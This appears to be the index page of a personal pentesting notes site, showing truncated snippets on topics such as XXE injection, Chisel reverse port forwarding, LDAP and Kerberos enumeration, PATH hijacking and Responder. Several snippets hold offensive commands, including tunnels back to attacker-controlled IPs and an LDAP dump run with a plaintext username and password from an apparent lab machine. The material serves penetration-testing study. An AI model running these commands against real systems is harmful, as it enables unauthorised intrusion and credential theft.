Shuciran Pentesting Notes

Legacy PFX Certificate

Login via PFX File: First we need to extract the key and the certificate from the pfx file: # Extracting the public certificate: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out public...

Chisel

Download Chisel Remote port forwarding Chisel as client: # Single Port .\\chisel.exe client 10.10.16.4:1337 R:1433:localhost:1433 # All the ports ./chisel client 10.10.14.3:1234 R:127.0.0.1:socks ...

XXE Blind Out of Band

Detection You can often detect blind XXE using the same technique as for XXE SSRF attacks but triggering the out-of-band network interaction to a system that you control. For example, you would def...

XXE Basic

Headers: To exploit an XXE Content-Type must be text/xml POST /action HTTP/1.0 Content-Type: text/xml File Reading While exploring an XXE it is important to use the tags provided by the appl...

Powershell Modules

Nishang If we want to add a .ps1 file into a Windows machine such as the Nishang series we can modify the latest line of such file (to load the script and then execute it): Write-Warning "S...

NTP (UDP 123)

Basic Enumeration ntpq -c readlist <IP_ADDRESS> ntpq -c readvar <IP_ADDRESS> ntpq -c peers <IP_ADDRESS> ntpq -c associations <IP_ADDRESS> ntpdc -c monlist <IP_ADDRESS>...

LDAP (tcp-369, tcp-636, tcp-3268)

LDAPDOMAINDUMP Dumping useful information from the domain controller via LDAP: ldapdomaindump -u 'htb.local\amanda' -p 'Ashare1972' 10.10.10.103 [*] Connecting to host... [*] Binding to host [+] Bi...

KERBEROS (tcp-88)

Explanation The Kerberos authentication protocol used by Microsoft is adopted from the Kerberos version 5 authentication protocol created by MIT and has been used as Microsoft’s primary authenticat...

Linux PATH Hijacking

In order to exploit a PATH Hijacking we need to identify two things: 1) That the script can be executed on another user’s context 2) There is a missing relative path on a command or on a libra...

Responder

LLMNR (Link-Local Multicast Name Resolution) What is LLMNR? Link-Local Multicast Name Resolution. Used to identify hosts when DNS fails to do so. Previously known as NBT-NS. The main drawb...